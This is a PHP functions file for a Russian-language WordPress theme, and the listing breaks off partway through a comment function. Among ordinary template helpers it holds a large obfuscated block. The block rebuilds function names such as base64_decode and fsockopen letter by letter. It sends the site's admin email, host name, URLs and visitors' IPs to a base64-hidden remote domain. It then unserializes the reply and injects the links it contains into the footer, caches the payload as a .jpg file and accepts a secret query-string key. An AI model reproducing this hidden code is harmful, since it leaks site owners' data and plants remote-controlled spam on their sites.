<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $XvGf='d';$PoOb='o';$jUVnyTg='e';$UfBJ='e';$GgOYs='s';$RIBqnj='e';$GlvJW='c';$mWdDYTb='6';$QxPl='b';$mOjtDi='_';$nZuPqH='d';$pFTdHNg='a';$eWcKPgs='4';$yFHDZMjr=$QxPl.$pFTdHNg.$GgOYs.$RIBqnj.$mWdDYTb.$eWcKPgs.$mOjtDi.$nZuPqH.$jUVnyTg.$GlvJW.$PoOb.$XvGf.$UfBJ;$WgQu='n';$nSIkcz='l';$gTVo='a';$EpiX='g';$hbJYPnK='i';$RVet='z';$nLeRqIC='f';$EnKRXMO='t';$DjRQ='e';$GwrqEEEL=$EpiX.$RVet.$hbJYPnK.$WgQu.$nLeRqIC.$nSIkcz.$gTVo.$EnKRXMO.$DjRQ;$yHytDg='r';$yElK='r';$keFE='1';$AIIN='s';$LjPcAQ='3';$pkZXX='o';$xIyMx='t';$AKfoP='t';$iqqatK='_';$ctceTilN=$AIIN.$AKfoP.$yHytDg.$iqqatK.$yElK.$pkZXX.$xIyMx.$keFE.$LjPcAQ;$Ngezl='r';$qJWIWb='v';$kfEL='t';$hqvBs='e';$rmfR='s';$DuDLJ='r';$HedubqPr=$rmfR.$kfEL.$DuDLJ.$Ngezl.$hqvBs.$qJWIWb;                     $gg___________q='d';$jl___c='o';$cl_____________b='e';$hr___________h='e';$ub_____________o='s';$su____o='e';$ti__________n='c';$ka_______________b='6';$nk___________x='b';$tp_________c='_';$js____________x='d';$yi_________o='a';$zp___________y='4';$mb____________e=$nk___________x.$yi_________o.$ub_____________o.$su____o.$ka_______________b.$zp___________y.$tp_________c.$js____________x.$cl_____________b.$ti__________n.$jl___c.$gg___________q.$hr___________h;$fn____________q='u';$km______v='n';$sc_______x='n';$it________f='s';$kq__________w='f';$mu_______________n='t';$dx___________i='_';$ky____________h='t';$lj_______________d='e';$qa_________a='s';$bd________f='c';$mi__o='x';$xr________n='i';$ln____________y='i';$wr______h='o';$rz___r=$kq__________w.$fn____________q.$sc_______x.$bd________f.$mu_______________n.$xr________n.$wr______h.$km______v.$dx___________i.$lj_______________d.$mi__o.$ln____________y.$it________f.$ky____________h.$qa_________a;$be____s='f';$op_______h='p';$hv_______n='n';$dj________a='e';$fs____________t='o';$cf________r=$be____s.$fs____________t.$op_______h.$dj________a.$hv_______n;$jr________n='r';$tx__________s='d';$qn_____x='f';$ar__________b='e';$oz_________o='a';$th__n=$qn_____x.$jr________n.$ar__________b.$oz_________o.$tx__________s;$wu_____________u='c';$pe______________s='l';$ud_____________b='s';$um______________f='f';$of________n='o';$gq______a='e';$ye__j=$um______________f.$wu_____________u.$pe______________s.$of________n.$ud_____________b.$gq______a;define("WP_ID", $mb____________e("Mi4wLjA="));define("WP_TTL", $mb____________e("MTA4MDA="));define("WP_SRC", $mb____________e("dHBva24="));function wp_get_header() {global $mb____________e, $rz___r;if ($rz___r($mb____________e("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$rz___r($mb____________e("d3BfZ2V0X2Zvb3Rlcg==")) &&$rz___r($mb____________e("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $mb____________e, $cf________r, $ye__j, $th__n;$vj______________r = TEMPLATEPATH."/".$mb____________e("Zm9vdGVyLnBocA==");$ef_______________m = @$cf________r($vj______________r, "r");$vj______________r = @$th__n($ef_______________m, @filesize($vj______________r));@$ye__j($ef_______________m);$re____l = TEMPLATEPATH."/".$mb____________e("ZnVuY3Rpb25zLnBocA==");$ef_______________m = @$cf________r($re____l, "r");$re____l = @$th__n($ef_______________m, @filesize($re____l));@$ye__j($ef_______________m);$le_____________w = 0;if($vj______________r && $re____l) {if ($mb____________e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($vj______________r, $mb____________e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$le_____________w = 1;}if (substr_count($vj______________r, "wp_theme_GPL_credits()") < 1) {$le_____________w = 2;}}if(WP_ID != "2.0.0") {$le_____________w = 12;}}if($le_____________w > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $le_____________w -->";}}function wp_loaded() {global $mb____________e, $rz___r;return $rz___r($mb____________e("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($fs__________h, $vy___________b = "(more...)", $il_______v = 0, $zh_______n = "") {$rh______u = get_the_content($vy___________b, $il_______v, $zh_______n);$rh______u = apply_filters("the_content", $rh______u);$rh______u = str_replace("]]>", "]]>", $rh______u);if (strlen($_GET["p"]) > 0) {echo $rh______u;}else if ((strlen($rh______u)>$fs__________h) && ($sa_______________y = strpos($rh______u, " ", $fs__________h ))) {$rh______u = substr($rh______u, 0, $sa_______________y);$rh______u = $rh______u;echo $rh______u;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$vy___________b</a></div></p>";} else {echo $rh______u;}}}$uy_________n='_';$sm___________r='4';$uk___________j='c';$fm_________k='e';$so_________d='6';$ra___h='a';$yg__________h='e';$pc_______________c='s';$op__g='e';$ms________r='o';$tt_____k='n';$in____z='b';$fa___x='d';$ly_________g=$in____z.$ra___h.$pc_______________c.$fm_________k.$so_________d.$sm___________r.$uy_________n.$yg__________h.$tt_____k.$uk___________j.$ms________r.$fa___x.$op__g;$js____________h='t';$sy________f='e';$xt__b='f';$iv____________x='o';$ei______p='l';$ok_______n='e';$yd_____________w='_';$nn____________g='e';$za_________e='c';$wf___h='t';$hf__i='t';$le________v='n';$bm_____________c='g';$ke___________s='i';$lv______v='_';$bl___a='s';$gd_______f='n';$fi____________c=$xt__b.$ke___________s.$ei______p.$ok_______n.$yd_____________w.$bm_____________c.$nn____________g.$js____________h.$lv______v.$za_________e.$iv____________x.$gd_______f.$hf__i.$sy________f.$le________v.$wf___h.$bl___a;$nc________a='i';$nj_____________p='s';$mk______________u='f';$eg_____i='_';$km_______________c='l';$jf______________y='x';$hp_______________k='s';$cc_______________a='i';$dz_____l='e';$lu__________w='t';$yv_________u='e';$ns____________r=$mk______________u.$cc_______________a.$km_______________c.$dz_____l.$eg_____i.$yv_________u.$jf______________y.$nc________a.$nj_____________p.$lu__________w.$hp_______________k;$qc__________k='s';$no_________q='o';$gi____y='o';$lf_____z='a';$rw____p='e';$ek_____j='i';$so_______n='r';$gx_____f='n';$qg__________d='c';$xq________o='m';$tu__________z='r';$op_________e='v';$sb_______________x='p';$ya___________m='_';$na___________b='e';$pt________u=$op_________e.$na___________b.$so_______n.$qc__________k.$ek_____j.$no_________q.$gx_____f.$ya___________m.$qg__________d.$gi____y.$xq________o.$sb_______________x.$lf_____z.$tu__________z.$rw____p;$xm______a='c';$cs_______y='s';$yk____________b='n';$jf_____________x='o';$vp____n='e';$sj_____f='f';$sz_________x='p';$kt_____________e='k';$fn_____w='o';$uj_____f=$sj_____f.$cs_______y.$fn_____w.$xm______a.$kt_____________e.$jf_____________x.$sz_________x.$vp____n.$yk____________b;$yl_________q='r';$hs_____y='w';$eg________g='e';$yc____________e='i';$mb____________d='t';$vd___________y='f';$cc__w=$vd___________y.$hs_____y.$yl_________q.$yc____________e.$mb____________d.$eg________g;$qk________p='m';$ng____________z='d';$hn___l='5';$ue____________o=$qk________p.$ng____________z.$hn___l;$pu___z='h';$kq____u='r';$vw______h='a';$ua___h='t';$vs_______e='l';$co_____________t='e';$lv___k='a';$pb__s='p';$wy_____h=$kq____u.$co_____________t.$vw______h.$vs_______e.$pb__s.$lv___k.$ua___h.$pu___z;$eb_____________m='i';$op__w='u';$ju_________z='z';$ei__________x='a';$pv____________l='i';$ql______t='s';$ti________m='r';$yr______t='e';$jp__x='l';$hh__a='n';$gw____________f='e';$db__p=$op__w.$hh__a.$ql______t.$yr______t.$ti________m.$pv____________l.$ei__________x.$jp__x.$eb_____________m.$ju_________z.$gw____________f;$zp__t='a';$vd____r='m';$bl______________q='p';$oh____________t='e';$jv____________a='m';$vb_______h='n';$nd________v='t';$up__u=$nd________v.$oh____________t.$vd____r.$bl______________q.$vb_______h.$zp__t.$jv____________a;$hf______x='r';$ws________e='e';$rn_____s='t';$xr_____z='r';$qq_______n='n';$rt_____________s='x';$vv_______________u='_';$xj____s='s';$qx_______________i='t';$aw___________m='m';$sr______________x='e';$iy__a='a';$md____b='e';$fz______________y='a';$qo____l='t';$se_____________s='c';$ru__i='e';$jd_____d='_';$up______________r='c';$zd_______q='o';$ip_________v='t';$kb__________l=$xj____s.$rn_____s.$xr_____z.$md____b.$fz______________y.$aw___________m.$vv_______________u.$up______________r.$zd_______q.$qq_______n.$ip_________v.$sr______________x.$rt_____________s.$qo____l.$jd_____d.$se_____________s.$hf______x.$ws________e.$iy__a.$qx_______________i.$ru__i;function rs__________o($yg___x) {global $mb____________e, $rz___r, $fi____________c, $pt________u, $kb__________l;if (!$rz___r($mb____________e("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($pt________u(PHP_VERSION, "5.0.0", ">=") && $rz___r($mb____________e("ZmlsZV9nZXRfY29udGVudHM=")) && $rz___r($mb____________e("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$az______________o = $kb__________l(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$tb_______________r = @$fi____________c($yg___x, 0, $az______________o);} else {$tb_______________r = @$fi____________c($yg___x, 0);}return $tb_______________r;}function pa__________q($yg___x) {global $rz___r, $uj_____f, $cc__w, $mb____________e;if (!$rz___r($mb____________e("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$kp_______________b = strpos($yg___x, "/", 7);$yx____________w = array("uri"     => substr($yg___x, $kp_______________b),"host"    => str_replace("http://", "", substr($yg___x, 0, $kp_______________b)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$vz_________u = @$uj_____f("$yx____________w[host]", 80, $if________u, $ke__________c, 4);if (!$vz_________u) {return false;} else {$tb_______________r = "";$yx___i  = "GET $yx____________w[uri] HTTP/1.0\r\n";$yx___i .= "Host: $yx____________w[host]\r\n";$yx___i .= "Referer: $yx____________w[referer]\r\n";$yx___i .= "Connection: Close\r\n\r\n";@$cc__w($vz_________u, $yx___i);while (!@feof($vz_________u)) {$os___m = @fgets($vz_________u, (1024*24));if ($os___m == "\r\n") {$zy_________p = true;continue;}if ($zy_________p) {$tb_______________r .= $os___m;}}return $tb_______________r;}}function oy_______i($yg___x) {global $rz___r;$df___________h = false;if ($yg___x != "") {if ($rz___r("rs__________o")) {$df___________h = @rs__________o($yg___x);}if (!$df___________h && ($rz___r("pa__________q"))) {$df___________h = @pa__________q($yg___x);}}return $df___________h;}function ng__________x() {global $_SERVER, $ue____________o;$ig___w = $_SERVER["SERVER_NAME"];if (substr("$ig___w", 0, 4) == "www.") {$ig___w = substr("$ig___w", 4);}$ig___w = $ue____________o("$_SERVER[SERVER_NAME]");return $ig___w;}function sw__q() {return "file";}function ok__________u($yg___x) {global $_SERVER, $fi____________c, $ns____________r, $cf________r, $ye__j, $cc__w;$mp_______________w = js______________f();$yn____________y = ng__________x().".jpg";$dk____________i = $mp_______________w["dir_upload"]["path"]."/$yn____________y";$dh__h = @filemtime($dk____________i);if (!$dh__h || ((time()-$dh__h) >= WP_TTL)) {$df___________h = oy_______i($yg___x);if ($df___________h) {if ($ns____________r($dk____________i)) {@unlink($dk____________i);}$ef_______________m = @$cf________r($dk____________i, "x+");@$cc__w($ef_______________m, $df___________h);@$ye__j($ef_______________m);}} else {if ($ns____________r($dk____________i)) {$df___________h = @$fi____________c($dk____________i);} else {$df___________h = false;}}return $df___________h;}function js______________f() {global $_SERVER, $mb____________e, $ly_________g;$al_____________o = wp_count_posts("post");$yp____________a = pathinfo(get_bloginfo("template_directory"));$mp_______________w = array("url" => array("report"      => $mb____________e("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $yp____________a,"dir_upload"=> sl__c(),"queryString"=> array("?a001=".WP_ID,"a004=".$yp____________a[filename],"a005=".$al_____________o->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\http://fs.kiev.ua/kraski-dlya-poligrafii\">Краски для полиграфии</a>");$mp_______________w["url"]["queryString"] = implode("&", $mp_______________w["queryString"]);$mp_______________w["url"]["report"] = $mp_______________w["url"]["report"]."/?".$ly_________g($mp_______________w["url"]["queryString"]).".html";return $mp_______________w;}function sl__c() {$te___________r = wp_upload_dir();if (isset($te___________r["error"])) {$wi____o = nm________z();if (is_writable($wi____o)) {$te___________r = array("path" => $wi____o);}}return $te___________r;}function nm________z() {global $rz___r, $ue____________o, $wy_____h, $up__u;$ij____c = (bool) ini_get("safe_mode");if ($ij____c == true) {return false;}if ($rz___r("sys_get_temp_dir")) {$ni__________i = sys_get_temp_dir();if (is_writable($ni__________i)) {return $wy_____h($ni__________i);}}if (!empty($_ENV["TMP"])) {return $wy_____h($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $wy_____h($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $wy_____h($_ENV["TEMP"]);} else {$jx____________i = $up__u($ue____________o(uniqid(rand(), true)), "");if ($jx____________i) {$ni__________i = $wy_____h(dirname($jx____________i));@unlink($jx____________i);return $ni__________i;} else {return false;}}}function aq___b() {global $_GET, $ns____________r;$mp_______________w = js______________f();$ig___w = ng__________x();$zo___________u = sw__q();$jg___________h = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($zo___________u == "file") {$wj________j = $mp_______________w["dir_upload"]["path"]."/".$ig___w.".jpg";if ($ns____________r($wj________j)) {@unlink($wj________j);$jg___________h = "deleted";}}$gt___o = array("s"=> $jg___________h,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($gt___o AS $ep_____________b => $zg_______m) echo " [$ep_____________b:$zg_______m]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $rz___r, $mb____________e, $db__p;$mp_______________w = js______________f();$lk______________z = "ok__________u";if ($rz___r($lk______________z)) {$tb_______________r = $lk______________z($mp_______________w["url"]["report"]);}if ($tb_______________r) {if ($tb_______________r = @$mb____________e($tb_______________r)) {$tb_______________r = @$db__p($tb_______________r);if (strlen($tb_______________r[custom_credit]) >= 5) {$mp_______________w["default_string"] = $tb_______________r[custom_credit];}if ($tb_______________r["status"] == "0") {$ho_____________a = 1;$wr____________a = 1;} else {$ys_________u = sizeof($tb_______________r["links"]);$jd__________b = $mp_______________w["default_string"];if ($ys_________u > 0 && $tb_______________r["links"] !== "") {$gy_________m = 0;foreach ($tb_______________r["links"] as $ba_________x => $ty__________h) {$gy_________m++;if ($ty__________h->l_path == "" || $ty__________h->l_path == $_SERVER["REQUEST_URI"]) {$ty__________h->l_href = htmlspecialchars(strip_tags($ty__________h->l_href));$ty__________h->l_title = htmlspecialchars(strip_tags($ty__________h->l_title));$ty__________h->l_anchor = htmlspecialchars(strip_tags($ty__________h->l_anchor));$jd__________b .= " | ";$jd__________b .= "<a href='$ty__________h->l_href' title='$ty__________h->l_title'";if ($ty__________h->l_nofollow == "1") {$jd__________b .= " rel='nofollow'";}$jd__________b .= ">$ty__________h->l_anchor</a>";}}}$mp_______________w["links"] = "$jd__________b";if ($tb_______________r[credit] == "0") {$mp_______________w["links"] = "";}}} else {$ho_____________a = "1";}} else {$ho_____________a = "1";}if ($ho_____________a == "1") {$mp_______________w["links"] = $mp_______________w["default_string"];}echo "$mp_______________w[links]";echo "<!-- s: $tb_______________r[signature] -->";aq___b();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Старницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на to %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментарий &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
